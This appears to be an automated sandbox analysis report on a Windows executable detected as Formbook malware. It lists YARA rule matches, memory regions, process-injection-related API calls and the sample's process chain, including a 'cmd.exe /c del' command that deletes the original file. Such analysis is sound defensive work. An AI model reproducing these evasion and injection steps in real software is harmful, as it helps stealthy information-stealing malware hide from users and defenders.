          Source: 2.2.NvkGETsSDb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.NvkGETsSDb.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.NvkGETsSDb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.NvkGETsSDb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.NvkGETsSDb.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.NvkGETsSDb.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.NvkGETsSDb.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.NvkGETsSDb.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.NvkGETsSDb.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.NvkGETsSDb.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.NvkGETsSDb.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.NvkGETsSDb.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.NvkGETsSDb.exe.3a2f770.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.NvkGETsSDb.exe.3a2f770.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.NvkGETsSDb.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.NvkGETsSDb.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.NvkGETsSDb.exe.39e0150.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.NvkGETsSDb.exe.39e0150.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.315401814.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.516991020.00000000028C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.303659400.000000000F70F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.514736730.0000000000150000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.253147010.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.315756855.0000000000FD0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.515839448.0000000002700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000000.288307054.000000000F70F000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.253638394.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.315792746.0000000001000000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.257370628.00000000038A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 0_2_001853750_2_00185375
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 0_2_04DC97C00_2_04DC97C0
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 0_2_04DC6A580_2_04DC6A58
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 0_2_04DC0C570_2_04DC0C57
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 0_2_04DC0C680_2_04DC0C68
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 0_2_04DC5E660_2_04DC5E66
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 0_2_04DC0A180_2_04DC0A18
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 0_2_04DC0A170_2_04DC0A17
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 0_2_001820500_2_00182050
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041E4232_2_0041E423
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041E5072_2_0041E507
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041D5A62_2_0041D5A6
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041E5B32_2_0041E5B3
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041DE462_2_0041DE46
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_00409E602_2_00409E60
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041DFA22_2_0041DFA2
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_009E53752_2_009E5375
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_009E20502_2_009E2050
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C622AE16_2_02C622AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C4FA2B16_2_02C4FA2B
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BCEBB016_2_02BCEBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5DBD216_2_02C5DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C503DA16_2_02C503DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C62B2816_2_02C62B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BBAB4016_2_02BBAB40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC20A016_2_02BC20A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAB09016_2_02BAB090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C628EC16_2_02C628EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C620A816_2_02C620A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5100216_2_02C51002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C6E82416_2_02C6E824
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BB412016_2_02BB4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B9F90016_2_02B9F900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C62EF716_2_02C62EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BB6E3016_2_02BB6E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5D61616_2_02C5D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C6DFCE16_2_02C6DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C61FF116_2_02C61FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C5D46616_2_02C5D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BA841F16_2_02BA841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C625DD16_2_02C625DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BC258116_2_02BC2581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BAD5E016_2_02BAD5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C61D5516_2_02C61D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02B90D2016_2_02B90D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C62D0716_2_02C62D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00152D9016_2_00152D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016E5B316_2_0016E5B3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016D5A616_2_0016D5A6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016DE4616_2_0016DE46
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00159E6016_2_00159E60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_00152FB016_2_00152FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016DFA216_2_0016DFA2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02B9B150 appears 48 times
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041A360 NtCreateFile,2_2_0041A360
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041A410 NtReadFile,2_2_0041A410
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041A490 NtClose,2_2_0041A490
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041A540 NtAllocateVirtualMemory,2_2_0041A540
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041A35A NtCreateFile,2_2_0041A35A
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041A40A NtReadFile,2_2_0041A40A
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeCode function: 2_2_0041A48A NtClose,2_2_0041A48A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9A50 NtCreateFile,LdrInitializeThunk,16_2_02BD9A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9860 NtQuerySystemInformation,LdrInitializeThunk,16_2_02BD9860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9840 NtDelayExecution,LdrInitializeThunk,16_2_02BD9840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD99A0 NtCreateSection,LdrInitializeThunk,16_2_02BD99A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_02BD9910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD96E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_02BD96E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD96D0 NtCreateKey,LdrInitializeThunk,16_2_02BD96D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9780 NtMapViewOfSection,LdrInitializeThunk,16_2_02BD9780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9FE0 NtCreateMutant,LdrInitializeThunk,16_2_02BD9FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9710 NtQueryInformationToken,LdrInitializeThunk,16_2_02BD9710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD95D0 NtClose,LdrInitializeThunk,16_2_02BD95D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9540 NtReadFile,LdrInitializeThunk,16_2_02BD9540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9A80 NtOpenDirectoryObject,16_2_02BD9A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9A20 NtResumeThread,16_2_02BD9A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9A10 NtQuerySection,16_2_02BD9A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9A00 NtProtectVirtualMemory,16_2_02BD9A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BDA3B0 NtGetContextThread,16_2_02BDA3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9B00 NtSetValueKey,16_2_02BD9B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD98A0 NtWriteVirtualMemory,16_2_02BD98A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD98F0 NtReadVirtualMemory,16_2_02BD98F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9820 NtEnumerateKey,16_2_02BD9820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BDB040 NtSuspendThread,16_2_02BDB040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD99D0 NtCreateProcessEx,16_2_02BD99D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9950 NtQueueApcThread,16_2_02BD9950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9610 NtEnumerateValueKey,16_2_02BD9610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9670 NtQueryInformationProcess,16_2_02BD9670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9660 NtAllocateVirtualMemory,16_2_02BD9660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9650 NtQueryValueKey,16_2_02BD9650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD97A0 NtUnmapViewOfSection,16_2_02BD97A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9730 NtQueryVirtualMemory,16_2_02BD9730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BDA710 NtOpenProcessToken,16_2_02BDA710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BDA770 NtOpenThread,16_2_02BDA770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9770 NtSetInformationFile,16_2_02BD9770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9760 NtOpenProcess,16_2_02BD9760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD95F0 NtQueryInformationFile,16_2_02BD95F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BDAD30 NtSetContextThread,16_2_02BDAD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9520 NtWaitForSingleObject,16_2_02BD9520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02BD9560 NtWriteFile,16_2_02BD9560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016A360 NtCreateFile,16_2_0016A360
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016A410 NtReadFile,16_2_0016A410
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016A490 NtClose,16_2_0016A490
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016A35A NtCreateFile,16_2_0016A35A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016A40A NtReadFile,16_2_0016A40A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0016A48A NtClose,16_2_0016A48A
          Source: NvkGETsSDb.exeBinary or memory string: OriginalFilename vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exe, 00000000.00000002.256996800.00000000028A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTaskNode.dll4 vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exe, 00000000.00000000.246291055.000000000019A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameComMemberTy.exe< vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exeBinary or memory string: OriginalFilename vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exe, 00000002.00000002.315857212.000000000103A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exe, 00000002.00000000.251515898.00000000009FA000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameComMemberTy.exe< vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exe, 00000002.00000002.316178527.000000000158F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exeBinary or memory string: OriginalFilenameComMemberTy.exe< vs NvkGETsSDb.exe
          Source: NvkGETsSDb.exeVirustotal: Detection: 15%
          Source: NvkGETsSDb.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\NvkGETsSDb.exe 'C:\Users\user\Desktop\NvkGETsSDb.exe'
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess created: C:\Users\user\Desktop\NvkGETsSDb.exe C:\Users\user\Desktop\NvkGETsSDb.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NvkGETsSDb.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeProcess created: C:\Users\user\Desktop\NvkGETsSDb.exe C:\Users\user\Desktop\NvkGETsSDb.exeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NvkGETsSDb.exe'Jump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NvkGETsSDb.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@3/3
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: NvkGETsSDb.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\NvkGETsSDb.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: NvkGETsSDb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: NvkGETsSDb.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
